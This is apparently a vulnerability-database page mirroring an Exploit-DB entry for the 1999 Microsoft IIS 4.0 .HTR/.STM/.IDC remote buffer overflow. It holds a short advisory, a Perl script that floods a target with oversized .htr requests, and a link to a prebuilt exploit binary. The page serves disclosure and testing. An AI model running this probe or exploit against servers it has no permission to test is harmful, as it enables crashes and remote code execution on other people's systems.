Lucene search
+L

Microsoft IIS 4.0 - Remote Buffer Overflow (1)

🗓️ 15 Jun 1999 00:00:00Reported by eEye Digital Security TeamType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Microsoft IIS 4.0 has a buffer overflow vulnerability allowing remote code execution via file requests.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-1999-0874
30 Apr 201000:00
circl
cve
CVE
CVE-1999-0874
2 Jun 200004:00
cve
cvelist
Cvelist
CVE-1999-0874
2 Jun 200004:00
cvelist
exploitdb
Exploit DB
Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)
30 Apr 201000:00
exploitdb
exploitdb
Exploit DB
Microsoft IIS 4.0 - Remote Buffer Overflow (2)
15 Jun 199900:00
exploitdb
exploitdb
Exploit DB
Microsoft IIS 4.0 - Remote Buffer Overflow (3)
15 Jun 199900:00
exploitdb
exploitdb
Exploit DB
Microsoft IIS 4.0 - Remote Buffer Overflow (4)
15 Jun 199900:00
exploitdb
exploitpack
exploitpack
Microsoft IIS 4.0 - Remote Buffer Overflow (2)
15 Jun 199900:00
exploitpack
nessus
Tenable Nessus
Microsoft IIS ISM.DLL HTR Request Remote Overflow
22 Jun 199900:00
nessus
metasploit
Metasploit
MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
21 Jan 200622:10
metasploit
Rows per page
source: https://www.securityfocus.com/bid/307/info

Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine.

IIS supports a number of file extensions that require futher processing. When a request is made for one of these types of files a specific DLL processes it. A stack buffer overflow vulnerability exists in several of these DLL's while handling .HTR, .STM or .IDC extensions.


Use the following script to test your site:

#!/usr/bin/perl
use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
warn "$i\n";
get "http://$ARGV[0]/".('a' x $i).".htr";
}

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19245.exe

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jun 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.74651
34